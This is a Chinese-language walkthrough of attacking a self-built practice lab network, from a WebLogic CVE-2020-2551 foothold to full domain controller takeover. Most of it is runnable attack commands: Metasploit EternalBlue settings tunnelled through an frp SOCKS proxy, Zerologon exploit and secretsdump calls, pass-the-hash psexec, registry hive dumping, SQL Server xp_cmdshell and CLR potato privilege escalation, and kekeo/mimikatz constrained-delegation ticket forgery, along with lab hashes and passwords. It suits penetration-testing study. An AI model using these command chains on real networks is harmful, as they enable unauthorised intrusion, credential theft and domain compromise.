記一次內網靶場學習
環境搭建
web服務器:
外網IP 192.160.0.100
內網IP 10.10.20.12
域內機器win7 :
內網IP 10.10.20.7
內網IP 10.10.10.7
域內服務器 Mssql:
內網IP 10.10.10.18
域控機器:
內網IP 10.10.10.8
外網滲透
端口掃描
搭建好環境,對目標192.168.0.100進行端口掃描探測
目錄掃描
發現目標開放了7001端口,進行目錄掃描探測,發現weblogic登錄口
weblogic漏洞利用
嘗試weblogic弱口令登錄不成功
通過weblogic漏洞利用工具,發現目標存在CVE-2020-2551漏洞可以利用
出網探測
ping www.baidu.com發現目標機器出網
殺軟識別
tasklist /svc 通過進程對比發現主機上沒有安裝殺軟
直接powershell上線cs
內網滲透
信息搜集
通過執行命令whoami /all發現存在雙網卡
密碼憑據抓取
通過hashdump抓取密碼Administrator ccef208c6485269c20db2cad21734fe7
ntlm hash值為ccef208c6485269c20db2cad21734fe7,通過cmd5解出明文密碼Admin12345
橫向移動
有了明文密碼我們可以進行遠程登陸,但真實環境中不到萬不得已一般不建議執行此操作,因此尋找其他的方法進行內網橫向移動
通過上傳fscan掃描10網段,發現存在ms17-010漏洞的10.10.20.7主機
一開始打算通過Eternalblue直接上線cs,發現不成功,改用其他方法
項目地址:https://github.com/0xFenrik/Eternalblue
隧道搭建
上傳frp搭建隧道代理
[common]#frpc配置 server_addr = VPS地址 server_port = 7000 [plugin_socks] type = tcp remote_port = 1080 plugin = socks5 [common]#frps配置 bind_addr =0.0.0.0 bind_port = 7000
永恒之藍ms17-010
改用metaspolit,調用永恒之藍模塊進行攻擊,成功獲取shell
msf6 > setg Proxies socks5:frps服務端IP:監聽端口 msf6 > setg ReverseAllowProxy true msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set payload windows/x64/meterpreter/bind_tcp msf6 > set rhost 10.10.20.7 msf6 > run
或者vi /etc/proxychains.conf修改配置文件socks5 127.0.0.1 1080
然后通過proxychains msfconsole啟動
成功后通過mimikatz執行creds_all獲取賬戶密碼redteam\saul:admin!@#45
中轉上線
由于目標機器win7不出網,因此以跳板機器作為中轉,新建一個監聽器
通過psexec進行上線
成功上線后進行內網掃描,探測存活主機,發現還存在10.10.10.8和10.10.10.18兩臺機器
通過信息搜集發現當前機器是在域環境內net user /domain
定位域控
接著定位到域控 net group "domain controllers" /domain
ps:一般來說DNS服務器就是域控
CVE-2020-1472
影響版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation)
通過CVE-2020-1472腳本進行檢測
項目地址:https://github.com/SecuraBV/CVE-2020-1472
1、重置管理員密鑰,進行置空
python3 cve-2020-1472-exploit.py OWA 10.10.10.8
2、通過 Dcsync 查看密碼hash
python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass
3、通過psexec和hash獲取域控權限
python psexec.py administrator@10.10.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7
4、使用secretsdump解析保存在本地的nt hash
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
5、通過reinstall腳本將$MACHINE.ACC:plain_password_hex中的原來nt hash恢復
python reinstall_original_pw.py OWA 10.10.10.8 8623dc75ede3ca9ec11f2475b12ef96d
約束委派接管域控
1、通過adfind尋找約束委派的用戶,發現為sqlserver的機器
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
2、通過端口探測發現sqlserver為10.10.10.18機器
3、使用fscan進行掃描fscan.exe -h 10.10.10.0/24 sqlserver為弱口令sa/sa
4、使用工具查看當前權限SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami
項目地址:https://github.com/uknowsec/SharpSQLTools/releases/tag/41
5、權限較低,使用以下命令進行提權:
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami
6、上線CS并抓到sqlserver的密碼redteam\sqlserver Server12345
根據先前的信息搜集可知 sqlserver 是一個約束委派用戶,可以通過約束委派攻擊來接管域控
項目地址:https://github.com/gentilkiwi/kekeo/releases
1、利用 kekeo 請求該用戶的 TGT
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"
2、然后使用這張 TGT 獲取域機器的 ST
kekeo.exe "tgs::s4u /tgt: TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"
3、使用 mimikatz 將 ST 導入當前會話,運行 mimikatz 進行 ptt
mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
4、成功獲取域控權限
